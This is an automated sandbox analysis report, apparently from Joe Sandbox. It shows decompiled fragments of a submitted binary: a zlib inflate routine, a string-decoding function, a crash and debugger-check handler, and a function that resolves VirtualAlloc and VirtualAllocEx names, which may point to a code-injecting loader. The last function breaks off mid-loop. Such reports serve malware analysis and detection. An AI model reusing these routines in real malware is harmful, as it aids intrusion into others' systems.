							__eax = ( *(__ebx + 4) >> 0xa) + 4;
							__eflags =  *(__ebx + 8) - ( *(__ebx + 4) >> 0xa) + 4;
							if( *(__ebx + 8) >= ( *(__ebx + 4) >> 0xa) + 4) {
								break;
							}
							__ecx = _v8;
							while(1) {
								__eflags = __ecx - 3;
								if(__ecx >= 3) {
									break;
								}
								__eflags = _v16;
								if(_v16 == 0) {
									goto L110;
								}
								__eax =  *__esi & 0x000000ff;
								_a8 = _a8 & 0x00000000;
								_v16 = _v16 - 1;
								__eax = ( *__esi & 0x000000ff) << __cl;
								_v12 = _v12 | ( *__esi & 0x000000ff) << __cl;
								__esi = __esi + 1;
								__ecx = __ecx + 8;
								__eflags = __ecx;
								_v24 = __esi;
								_v8 = __ecx;
							}
							__ecx =  *(__ebx + 8);
							__eax = _v12;
							__ecx =  *(0x43ea10 +  *(__ebx + 8) * 4);
							__edx =  *(__ebx + 0xc);
							_v12 = _v12 >> 3;
							__eax = _v12 & 0x00000007;
							 *( *(__ebx + 0xc) +  *(0x43ea10 +  *(__ebx + 8) * 4) * 4) = _v12 & 0x00000007;
							 *(__ebx + 8) =  *(__ebx + 8) + 1;
							_t168 =  &_v8;
							 *_t168 = _v8 - 3;
							__eflags =  *_t168;
						}
						while(1) {
							__eflags =  *(__ebx + 8) - 0x13;
							if( *(__ebx + 8) >= 0x13) {
								break;
							}
							__eax =  *(__ebx + 8);
							__eax =  *(0x43ea10 +  *(__ebx + 8) * 4);
							__ecx =  *(__ebx + 0xc);
							 *( *(__ebx + 0xc) +  *(0x43ea10 +  *(__ebx + 8) * 4) * 4) =  *( *(__ebx + 0xc) +  *(0x43ea10 +  *(__ebx + 8) * 4) * 4) & 0x00000000;
							_t180 = __ebx + 8;
							 *_t180 =  *(__ebx + 8) + 1;
							__eflags =  *_t180;
						}
						__ecx = __ebx + 0x14;
						__eax = __ebx + 0x10;
						__esi = __edi;
						 *(__ebx + 0x10) = 7;
						__eax = E00406522(__edi,  *(__ebx + 0xc), __ebx + 0x10, __ebx + 0x14,  *((intOrPtr*)(__ebx + 0x24)));
						__esi = __eax;
						__eflags = __esi;
						if(__esi != 0) {
							__eflags = __esi - 0xfffffffd;
							if(__esi == 0xfffffffd) {
								__eax =  *((intOrPtr*)(__edi + 0x24))( *((intOrPtr*)(__edi + 0x28)),  *(__ebx + 0xc));
								_pop(__ecx);
								_pop(__ecx);
								 *__ebx = 9;
							}
							_push(__esi);
							goto L5;
						}
						 *(__ebx + 8) =  *(__ebx + 8) & __eax;
						__esi = _v24;
						 *__ebx = 5;
						goto L98;
						L59:
						__ecx = _v8;
						while(1) {
							__eflags = __ecx - 0xe;
							if(__ecx >= 0xe) {
								break;
							}
							__eflags = _v16;
							if(_v16 == 0) {
								goto L110;
							}
							__eax =  *__esi & 0x000000ff;
							_a8 = _a8 & 0x00000000;
							_v16 = _v16 - 1;
							__eax = ( *__esi & 0x000000ff) << __cl;
							_v12 = _v12 | ( *__esi & 0x000000ff) << __cl;
							__esi = __esi + 1;
							__ecx = __ecx + 8;
							__eflags = __ecx;
							_v24 = __esi;
							_v8 = __ecx;
						}
						__eax = _v12;
						__eax = _v12 & 0x00003fff;
						__ecx = __eax;
						__ecx = __eax & 0x0000001f;
						 *(__ebx + 4) = __eax;
						__eflags = __ecx - 0x1d;
						if(__ecx > 0x1d) {
							L116:
							 *__ebx = 9;
							 *(__edi + 0x18) = "too many length or distance symbols";
							break;
						}
						__eax = __eax >> 5;
						__eax = __eax & 0x0000001f;
						__eflags = __eax - 0x1d;
						if(__eax > 0x1d) {
							goto L116;
						}
						__eax =  *((intOrPtr*)(__edi + 0x20))( *((intOrPtr*)(__edi + 0x28)), __eax, 4);
						__esp = __esp + 0xc;
						 *(__ebx + 0xc) = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							L111:
							_push(0xfffffffc);
							goto L5;
						}
						_v12 = _v12 >> 0xe;
						_v8 = _v8 - 0xe;
						 *(__ebx + 8) =  *(__ebx + 8) & 0x00000000;
						 *__ebx = 4;
						goto L72;
						L36:
						__eflags = _v16;
						if(_v16 == 0) {
							goto L110;
						}
						__eflags = _v28;
						if(_v28 != 0) {
							L53:
							__esi =  *(__ebx + 4);
							_a8 = _a8 & 0x00000000;
							__eflags = __esi - _v16;
							if(__esi > _v16) {
								__esi = _v16;
							}
							__eflags = __esi - _v28;
							if(__esi > _v28) {
								__esi = _v28;
							}
							__eax = E0041F8C0(_v20, _v24, __esi);
							_v24 = _v24 + __esi;
							_v16 = _v16 - __esi;
							_v20 = _v20 + __esi;
							_v28 = _v28 - __esi;
							_t122 = __ebx + 4;
							 *_t122 =  *(__ebx + 4) - __esi;
							__eflags =  *_t122;
							if( *_t122 == 0) {
								L34:
								 *(__ebx + 0x18) =  ~( *(__ebx + 0x18));
								asm("sbb eax, eax");
								__eax =  ~( *(__ebx + 0x18)) & 0x00000007;
								__eflags = __eax;
								L35:
								 *__ebx = __eax;
							}
							goto L108;
						}
						__ecx =  *(__ebx + 0x2c);
						__eflags = _v20 - __ecx;
						if(_v20 != __ecx) {
							L44:
							__eax = _v20;
							__esi = __ebx;
							 *(__ebx + 0x34) = _v20;
							__eax = E0040511C(__ecx, __edi, __esi, _a8);
							__edx =  *(__ebx + 0x34);
							__ecx =  *(__ebx + 0x30);
							_v20 = __edx;
							__eflags = __edx - __ecx;
							if(__edx >= __ecx) {
								__edx =  *(__ebx + 0x2c);
								__edx =  *(__ebx + 0x2c) - _v20;
								__eflags = __edx;
							} else {
								__ecx = __ecx - _v20;
								__edx = __ecx - _v20 - 1;
							}
							_v28 = __edx;
							__edx =  *(__ebx + 0x2c);
							__eflags = _v20 - __edx;
							if(_v20 == __edx) {
								__esi =  *(__ebx + 0x28);
								__eflags = __esi - __ecx;
								if(__eflags != 0) {
									_v20 = __esi;
									if(__eflags >= 0) {
										__edx = __edx - __esi;
										__eflags = __edx;
										_v28 = __edx;
									} else {
										__ecx = __ecx - __esi;
										_v28 = __ecx;
									}
								}
							}
							__eflags = _v28;
							if(_v28 == 0) {
								L115:
								__ecx = _v12;
								 *((intOrPtr*)(__ebx + 0x20)) = _v12;
								__ecx = _v8;
								 *(__ebx + 0x1c) = _v8;
								__ecx = _v16;
								 *(__edi + 4) = _v16;
								__ecx = _v24;
								__edx = __ecx;
								__edx = __ecx -  *__edi;
								 *__edi = __ecx;
								__ecx = _v20;
								 *((intOrPtr*)(__edi + 8)) =  *((intOrPtr*)(__edi + 8)) + __edx;
								 *(__ebx + 0x34) = __ecx;
								_push(__eax);
								goto L9;
							} else {
								goto L53;
							}
						}
						__eax =  *(__ebx + 0x30);
						__edx =  *(__ebx + 0x28);
						__eflags = __edx - __eax;
						if(__eflags == 0) {
							goto L44;
						}
						_v20 = __edx;
						if(__eflags >= 0) {
							__ecx = __ecx - __edx;
							__eflags = __ecx;
							_v28 = __ecx;
						} else {
							__eax = __eax - __edx;
							_v28 = __eax;
						}
						__eflags = _v28;
						if(_v28 != 0) {
							goto L53;
						} else {
							goto L44;
						}
						L27:
						__ecx = _v8;
						while(1) {
							__eflags = __ecx - 0x20;
							if(__ecx >= 0x20) {
								break;
							}
							__eax = 0;
							__eflags = _v16;
							if(_v16 == 0) {
								__ecx = _v12;
								_push(_a8);
								 *((intOrPtr*)(__ebx + 0x20)) = _v12;
								__ecx = _v8;
								 *(__ebx + 0x1c) = __ecx;
								goto L7;
							}
							_v16 = _v16 - 1;
							_a8 = 0;
							 *__esi & 0x000000ff = ( *__esi & 0x000000ff) << __cl;
							_v12 = _v12 | ( *__esi & 0x000000ff) << __cl;
							__esi = __esi + 1;
							__ecx = __ecx + 8;
							__eflags = __ecx;
							_v24 = __esi;
							_v8 = __ecx;
						}
						__ecx = _v12;
						__eax = _v12;
						__ecx =  !_v12;
						__eax = _v12 & 0x0000ffff;
						__ecx =  !_v12 >> 0x10;
						__eflags = __ecx - __eax;
						if(__ecx != __eax) {
							 *__ebx = 9;
							 *(__edi + 0x18) = "invalid stored block lengths";
							break;
						}
						 *(__ebx + 4) = __eax;
						__eax = 0;
						_v8 = 0;
						_v12 = 0;
						__eflags =  *(__ebx + 4);
						if( *(__ebx + 4) == 0) {
							goto L34;
						}
						__eax = 2;
						goto L35;
						L14:
						_t447 = 3;
						while(1) {
							__eflags = _v8 - _t447;
							if(_v8 >= _t447) {
								break;
							}
							__eflags = _v16;
							if(_v16 == 0) {
								goto L110;
							}
							_a8 = _a8 & 0x00000000;
							_v16 = _v16 - 1;
							_v12 = _v12 | ( *_t449 & 0x000000ff) << _v8;
							_t449 =  &(_t449[1]);
							_t36 =  &_v8;
							 *_t36 = _v8 + 8;
							__eflags =  *_t36;
							_v24 = _t449;
						}
						_t419 = _v12 & 0x00000007;
						_t421 = _t419 >> 1;
						__eflags = _t421;
						_t437[6] = _t419 & 1;
						if(_t421 == 0) {
							_v8 = _v8 - _t447;
							_t446 = _v8 & 0x00000007;
							_v8 = _v8 - _t446;
							 *_t437 = 1;
							_v12 = _v12 >> 3 >> _t446;
							goto L108;
						}
						_t428 = _t421 - 1;
						__eflags = _t428;
						if(_t428 == 0) {
							_t430 = E00405205(_t448, 9, 5, 0x43d910, 0x43e910);
							_t453 = _t453 + 0x10;
							_t437[1] = _t430;
							__eflags = _t430;
							if(_t430 == 0) {
								goto L111;
							}
							_v12 = _v12 >> 3;
							_v8 = _v8 - 3;
							 *_t437 = 6;
							goto L108;
						}
						_t431 = _t428 - 1;
						__eflags = _t431;
						if(_t431 == 0) {
							_v12 = _v12 >> 3;
							_v8 = _v8 - _t447;
							 *_t437 = _t447;
							goto L108;
						}
						__eflags = _t431 != 1;
						if(_t431 != 1) {
							goto L108;
						}
						 *_t437 = 9;
						_t448[6] = "invalid block type";
						_t437[8] = _v12 >> 3;
						_t426 = _v8 + 0xfffffffd;
						_push(0xfffffffd);
						goto L6;
					}
					L114:
					_push(0xfffffffd);
					goto L5;
					L129:
					_push(1);
					goto L5;
					L127:
					__eax = _v20;
					__esi = __ebx;
					 *(__ebx + 0x34) = _v20;
					__eax = E0040511C(__ecx, __edi, __esi, _a8);
					__ecx =  *(__ebx + 0x34);
					_v20 = __ecx;
					__eflags =  *(__ebx + 0x30) - __ecx;
					if( *(__ebx + 0x30) != __ecx) {
						goto L115;
					}
					 *__ebx = 8;
					goto L129;
				} else {
					L4:
					_push(0xfffffffe);
					L5:
					_t437[8] = _v12;
					_t426 = _v8;
					L6:
					_t437[7] = _t426;
					_t427 = _v16;
					L7:
					_t448[1] = _t427;
					L8:
					_t413 = _v24;
					_t440 = _t413 -  *_t448;
					 *_t448 = _t413;
					_t448[2] = _t448[2] + _t413 -  *_t448;
					_t437[0xd] = _v20;
					L9:
					_t450 = _t437;
					L10:
					return E0040511C(_t440, _t448, _t450);
				}
			}

0x00405857
0x0040585a
0x0040585f
0x00405864
0x00405866
0x0040586c
0x00405872
0x00405875
0x00405878
0x0040587b
0x00405880
0x0040588a
0x0040588a
0x00405882
0x00405884
0x00405884
0x0040588c
0x0040588f
0x00405894
0x004058cc
0x004058cc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405df6
0x00405df6
0x00405dfc
0x00405dff
0x00405e02
0x00405e05
0x00405e08
0x00405e0d
0x00405e0f
0x00405e11
0x00405e14
0x00405e17
0x00405e1a
0x00405e1d
0x00405e1f
0x00405e21
0x00405e27
0x00405e2a
0x00405feb
0x00000000
0x00405feb
0x00405e33
0x00405e38
0x00405e3e
0x00405e40
0x00405e43
0x00405e46
0x00405e49
0x00405e4c
0x00405e4f
0x00405e52
0x00405e53
0x00405e54
0x00405e57
0x00405e5a
0x00405e5d
0x00405e60
0x00405e62
0x00405e69
0x00405e6c
0x00405e6c
0x00405e64
0x00405e64
0x00405e66
0x00405e66
0x00405e6e
0x00405e71
0x00405e74
0x00405ff1
0x00405ff7
0x00000000
0x00405e7a
0x00405e7a
0x00405e7c
0x00405e7e
0x00405e7e
0x00405e80
0x00405e83
0x004058c9
0x00000000
0x004058c9
0x00000000
0x00405e89
0x00405d47
0x00405d47
0x00405d47
0x00405d4c
0x00405d4f
0x00405d55
0x00405d55
0x00405d5c
0x00405d5f
0x00000000
0x00000000
0x00405c25
0x00405c4e
0x00405c4e
0x00405c51
0x00000000
0x00000000
0x00405c2a
0x00405c2e
0x00405e8e
0x00405e91
0x00405e94
0x00405e9a
0x00405e9d
0x00000000
0x00405e9d
0x00405c34
0x00405c37
0x00405c3a
0x00405c3e
0x00405c41
0x00405c43
0x00405c46
0x00405c47
0x00405c47
0x00405c47
0x00405c4b
0x00405c4b
0x00405c53
0x00405c5a
0x00405c5d
0x00405c60
0x00405c63
0x00405c67
0x00405c6a
0x00405c6d
0x00405c70
0x00405c73
0x00405c8e
0x00405c91
0x00405c98
0x00405c93
0x00405c95
0x00405c95
0x00405c9b
0x00405c9d
0x00405ca3
0x00405caa
0x00405cd3
0x00405cd3
0x00405cd6
0x00405cd9
0x00405cdc
0x00000000
0x00000000
0x00405caf
0x00405cb3
0x00000000
0x00000000
0x00405cb9
0x00405cbc
0x00405cbf
0x00405cc3
0x00405cc6
0x00405cc8
0x00405ccb
0x00405ccc
0x00405ccc
0x00405ccc
0x00405cd0
0x00405cd0
0x00405cde
0x00405ce8
0x00405ceb
0x00405cee
0x00405cf0
0x00405cf3
0x00405cf6
0x00405cf9
0x00405cfc
0x00405d01
0x00405d04
0x00405d0a
0x00405d0a
0x00405d14
0x00405d16
0x00405d18
0x00405f2a
0x00405f33
0x00405f36
0x00405f3c
0x00405f43
0x00405f46
0x00405f49
0x00405f4c
0x00405f4f
0x00405f52
0x00405f55
0x00405f57
0x00405f59
0x00405f5b
0x00405f5e
0x00405f63
0x00405f65
0x00000000
0x00405f6d
0x00405d1e
0x00405d22
0x00405d36
0x00405d36
0x00405d38
0x00405d38
0x00405d38
0x00405d3b
0x00405d3e
0x00405d3f
0x00405d3f
0x00405d3f
0x00405d3f
0x00405d44
0x00000000
0x00405d44
0x00405d24
0x00405d27
0x00000000
0x00000000
0x00405d2d
0x00405d30
0x00000000
0x00405d30
0x00405c75
0x00405c78
0x00405c7a
0x00405c7d
0x00405c80
0x00405c83
0x00405c86
0x00405c86
0x00405d68
0x00405d6b
0x00405d73
0x00405d7b
0x00405d7f
0x00405d81
0x00405d84
0x00405d86
0x00405d89
0x00405d8f
0x00405d90
0x00405d94
0x00405d9a
0x00405d9c
0x00405da3
0x00405daf
0x00405db4
0x00405db6
0x00405f75
0x00405f78
0x00405f7b
0x00405f83
0x00405f86
0x00405f87
0x00405f88
0x00405f88
0x00405f8e
0x00405f91
0x00405f94
0x00405f97
0x00405f9a
0x00405f9d
0x00405fa0
0x00405fa3
0x00405fa5
0x00405fa7
0x00405fa9
0x00405fac
0x00405faf
0x00405fb2
0x00405fb5
0x00000000
0x00405fb5
0x00405dbf
0x00405dca
0x00405dd2
0x00405dd4
0x00405fbb
0x00405fbe
0x00405fc1
0x00405fc4
0x00405fc7
0x00405fca
0x00405fcd
0x00405fd0
0x00405fd3
0x00405fd5
0x00405fd7
0x00405fd9
0x00405fdc
0x00405fdf
0x00405fe2
0x00405fe4
0x00000000
0x00405fe4
0x00405dda
0x00405de0
0x00405de6
0x00405de9
0x00405dea
0x00405df0
0x00405df2
0x00405df5
0x00000000
0x00405bc2
0x00405bc2
0x00405bc5
0x00405bc8
0x00405bcb
0x00405bce
0x00000000
0x00000000
0x00405b74
0x00405b9c
0x00405b9c
0x00405b9f
0x00000000
0x00000000
0x00405b79
0x00405b7d
0x00000000
0x00000000
0x00405b83
0x00405b86
0x00405b8a
0x00405b8d
0x00405b8f
0x00405b92
0x00405b93
0x00405b93
0x00405b96
0x00405b99
0x00405b99
0x00405ba1
0x00405ba4
0x00405ba7
0x00405bae
0x00405bb1
0x00405bb5
0x00405bb8
0x00405bbb
0x00405bbe
0x00405bbe
0x00405bbe
0x00405bbe
0x00405be6
0x00405be6
0x00405bea
0x00000000
0x00000000
0x00405bd2
0x00405bd5
0x00405bdc
0x00405bdf
0x00405be3
0x00405be3
0x00405be3
0x00405be3
0x00405bef
0x00405bf2
0x00405bfa
0x00405bfc
0x00405c02
0x00405c07
0x00405c0c
0x00405c0e
0x00405f0e
0x00405f11
0x00405f19
0x00405f1c
0x00405f1d
0x00405f1e
0x00405f1e
0x00405f24
0x00000000
0x00405f24
0x00405c14
0x00405c17
0x00405c1a
0x00000000
0x00405aed
0x00405aed
0x00405b15
0x00405b15
0x00405b18
0x00000000
0x00000000
0x00405af2
0x00405af6
0x00000000
0x00000000
0x00405afc
0x00405aff
0x00405b03
0x00405b06
0x00405b08
0x00405b0b
0x00405b0c
0x00405b0c
0x00405b0f
0x00405b12
0x00405b12
0x00405b1a
0x00405b1d
0x00405b22
0x00405b24
0x00405b27
0x00405b2a
0x00405b2d
0x00405eff
0x00405eff
0x00405f05
0x00000000
0x00405f05
0x00405b33
0x00405b36
0x00405b39
0x00405b3c
0x00000000
0x00000000
0x00405b4f
0x00405b52
0x00405b55
0x00405b58
0x00405b5a
0x00405ea6
0x00405ea6
0x00000000
0x00405ea6
0x00405b60
0x00405b64
0x00405b68
0x00405b6c
0x00000000
0x00405a15
0x00405a15
0x00405a19
0x00000000
0x00000000
0x00405a1f
0x00405a23
0x00405aad
0x00405aad
0x00405ab0
0x00405ab4
0x00405ab7
0x00405ab9
0x00405ab9
0x00405abc
0x00405abf
0x00405ac1
0x00405ac1
0x00405acb
0x00405ad0
0x00405ad3
0x00405ad6
0x00405ad9
0x00405adf
0x00405adf
0x00405adf
0x00405ae2
0x00405a04
0x00405a07
0x00405a09
0x00405a0b
0x00405a0b
0x00405a0e
0x00405a0e
0x00405a0e
0x00000000
0x00405ae2
0x00405a29
0x00405a2c
0x00405a2f
0x00405a53
0x00405a53
0x00405a59
0x00405a5b
0x00405a5e
0x00405a63
0x00405a67
0x00405a6a
0x00405a6d
0x00405a6f
0x00405a79
0x00405a7c
0x00405a7c
0x00405a71
0x00405a73
0x00405a76
0x00405a76
0x00405a7f
0x00405a82
0x00405a85
0x00405a88
0x00405a8a
0x00405a8d
0x00405a8f
0x00405a91
0x00405a94
0x00405a9e
0x00405a9e
0x00405aa0
0x00405a96
0x00405a96
0x00405a99
0x00405a99
0x00405a94
0x00405a8f
0x00405aa3
0x00405aa7
0x00405ed5
0x00405ed5
0x00405ed8
0x00405edb
0x00405ede
0x00405ee1
0x00405ee4
0x00405ee7
0x00405eea
0x00405eec
0x00405eee
0x00405ef0
0x00405ef3
0x00405ef6
0x00405ef9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405aa7
0x00405a31
0x00405a34
0x00405a37
0x00405a39
0x00000000
0x00000000
0x00405a3b
0x00405a3e
0x00405a48
0x00405a48
0x00405a4a
0x00405a40
0x00405a40
0x00405a43
0x00405a43
0x00405a4d
0x00405a51
0x00000000
0x00000000
0x00000000
0x00000000
0x004059aa
0x004059aa
0x004059d2
0x004059d2
0x004059d5
0x00000000
0x00000000
0x004059af
0x004059b1
0x004059b4
0x00405ead
0x00405eb0
0x00405eb3
0x00405eb6
0x00405eb9
0x00000000
0x00405eb9
0x004059ba
0x004059bd
0x004059c3
0x004059c5
0x004059c8
0x004059c9
0x004059c9
0x004059cc
0x004059cf
0x004059cf
0x004059d7
0x004059da
0x004059dd
0x004059df
0x004059e4
0x004059e7
0x004059e9
0x00405ec1
0x00405ec7
0x00000000
0x00405ec7
0x004059ef
0x004059f2
0x004059f4
0x004059f7
0x004059fa
0x004059fd
0x00000000
0x00000000
0x00405a01
0x00000000
0x004058d3
0x004058d5
0x004058fc
0x004058fc
0x004058ff
0x00000000
0x00000000
0x004058d8
0x004058dc
0x00000000
0x00000000
0x004058e8
0x004058ec
0x004058f1
0x004058f4
0x004058f5
0x004058f5
0x004058f5
0x004058f9
0x004058f9
0x00405904
0x00405910
0x00405910
0x00405913
0x00405916
0x0040598c
0x00405995
0x0040599d
0x004059a0
0x004059a2
0x00000000
0x004059a2
0x00405918
0x00405918
0x00405919
0x00405966
0x0040596b
0x0040596e
0x00405971
0x00405973
0x00000000
0x00000000
0x00405979
0x0040597d
0x00405981
0x00000000
0x00405981
0x0040591b
0x0040591b
0x0040591c
0x00405948
0x0040594c
0x0040594f
0x00000000
0x0040594f
0x0040591e
0x0040591f
0x00000000
0x00000000
0x0040592b
0x00405931
0x00405938
0x0040593e
0x00405941
0x00000000
0x00405941
0x00405ece
0x00405ece
0x00000000
0x0040601f
0x0040601f
0x00000000
0x00405ff9
0x00405ff9
0x00405fff
0x00406001
0x00406004
0x0040600a
0x0040600d
0x00406010
0x00406013
0x00000000
0x00000000
0x00406019
0x00000000
0x00405896
0x00405896
0x00405896
0x00405898
0x0040589b
0x0040589e
0x004058a1
0x004058a1
0x004058a4
0x004058a7
0x004058a7
0x004058aa
0x004058aa
0x004058af
0x004058b1
0x004058b6
0x004058b9
0x004058bc
0x004058bc
0x004058be
0x00000000
0x004058c3

APIs

_memmove.LIBCMT ref: 00405ACB

Strings

invalid bit length repeat, xrefs: 00405F3C
invalid block type, xrefs: 00405931
too many length or distance symbols, xrefs: 00405F05
invalid stored block lengths, xrefs: 00405EC7

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid bit length repeat$invalid block type$invalid stored block lengths$too many length or distance symbols
API String ID: 4104443479-26694007
Opcode ID: 579c078a2311c507e2abf7958272ab61ae095c506407874197cb8ed21d884ddc
Instruction ID: acc9b6fe7f4f41752e999a4aaccd210710c37946fa714fab1102fcd6b1177461
Opcode Fuzzy Hash: 579c078a2311c507e2abf7958272ab61ae095c506407874197cb8ed21d884ddc
Instruction Fuzzy Hash: 63520771910619DFCF14CFA8C584AAEBBF1FF48310F2481AAD855AB785D338AA50DF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F5CF Relevance: 9.1, APIs: 6, Instructions: 92stringencryptionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F60C
lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00414A84,?,00410DA2,?,?,0043D12C), ref: 0040F627
CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040F62F
_memmove.LIBCMT ref: 0040F6B1
lstrcat.KERNEL32(0043D12C,0043D12C), ref: 0040F6D6
lstrcat.KERNEL32(0043D12C,0043D12C), ref: 0040F6E8

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptString_memmove_memsetlstrlen
String ID:
API String ID: 943939369-0
Opcode ID: 91802a04d093d2ab84b3bd635316dd8ce1655da31a980804ce990548df2dd143
Instruction ID: d79844091d2f1476558d6e78e1320cada1c845ee1ad22c51412705de05168576
Opcode Fuzzy Hash: 91802a04d093d2ab84b3bd635316dd8ce1655da31a980804ce990548df2dd143
Instruction Fuzzy Hash: FB314FB5D0411AAFCB209F55DD849FFBBBCAF09344F4004BAF409E2251DB794A468F59

Uniqueness

Uniqueness Score: -1.00%

Function 00E82BB6 Relevance: 9.1, APIs: 6, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00E82BB6(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				void _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				void* _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				void _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00E82DAE(_t34);
				 *_t60 = 0x2cc;
				_v632 = memset( &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				memset( &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00E82DAE(_t49);
				}
				return _t49;
			}

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E82BC2
memset.VCRUNTIME140(?,00000000,00000003), ref: 00E82BE8
memset.VCRUNTIME140(?,00000000,00000050), ref: 00E82C72
IsDebuggerPresent.KERNEL32 ref: 00E82C8E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E82CAE
UnhandledExceptionFilter.KERNEL32(?), ref: 00E82CB8

Memory Dump Source

Source File: 00000002.00000002.245596346.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.245586506.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245602228.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245613917.0000000000E86000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245696548.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_file.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
String ID:
API String ID: 1045392073-0
Opcode ID: 7db3cdc99613c0540c5fa1707af0e636a0397cbb7194b0521a5252a40fb46cb4
Instruction ID: dfe2eb2264c420eb0d030eff093a29a3dfb25379e295600426f2d90fe5c81a10
Opcode Fuzzy Hash: 7db3cdc99613c0540c5fa1707af0e636a0397cbb7194b0521a5252a40fb46cb4
Instruction Fuzzy Hash: 8D312BB5D012189BDB11EFA0D989BCDBBF8AF08300F1041A9E50DB7290EB715A88CF05

Uniqueness

Uniqueness Score: -1.00%

Function 00E81730 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00E81730(void* __ebx, void* __edx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v32;
				char _v40;
				char _v56;
				char _v60;
				char _v80;
				char _v92;
				signed int _t16;
				intOrPtr* _t30;
				char* _t42;
				void* _t47;
				void* _t48;
				void* _t49;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				signed int _t56;
				signed int _t57;
				signed int _t59;
				intOrPtr* _t60;

				_t61 = __eflags;
				_t50 = __esi;
				_t46 = __edx;
				_t35 = __ebx;
				_t56 = _t57;
				_t59 = (_t57 & 0xfffffff8) - 0x5c;
				_t16 =  *0xe86004; // 0xbb40e64e
				_v8 = _t16 ^ _t59;
				_push(__esi);
				E00E81A20(__ebx,  &_v80, __edx, __esi, __eflags, "VirtualAlloc");
				E00E81A20(__ebx,  &_v60, __edx, _t50, __eflags, "VirtualAllocEx");
				E00E81A20(_t35,  &_v40, _t46, _t50, _t61, "kernel32.dll");
				_t51 = E00E81A00( &_v92);
				_t47 = 0;
				_t62 = _t51;
				if(_t51 != 0) {
					do {
						 *((char*)(_t47 + 0xecf210)) =  *((intOrPtr*)(E00E81A10(_t62, _t47)));
						_t47 = _t47 + 1;
					} while (_t47 < _t51);
				}
				_t52 = E00E81A00( &_v56);
				_t48 = 0;
				_t64 = _t52;
				if(_t52 != 0) {
					do {
						 *((char*)(_t48 + 0xecf2d0)) =  *((intOrPtr*)(E00E81A10(_t64, _t48)));
						_t48 = _t48 + 1;
					} while (_t48 < _t52);
				}
				_t41 =  &_v32;
				_t53 = E00E81A00( &_v32);
				_t49 = 0;
				_t66 = _t53;
				if(_t53 != 0) {
					do {
						_t41 =  &_v32;
						_t30 = E00E81A10(_t66, _t49);
						_t23 =  *_t30;
						 *((char*)(_t49 + 0xecf250)) =  *_t30;
						_t49 = _t49 + 1;
					} while (_t49 < _t53);
				}
				_t42 =  &_v92;
				E00E812A0(_t23, _t42, _t41);
				L11();
				 *0xecf2c8 = 0x1dcdad44;
				srand(0x1dcdad44);
				_t60 = _t59 + 4;
				_t54 = 0;
				do {
					_t15 = _t54 + 0xe86018; // 0xe86018
					L00E81980(_t56, _t15);
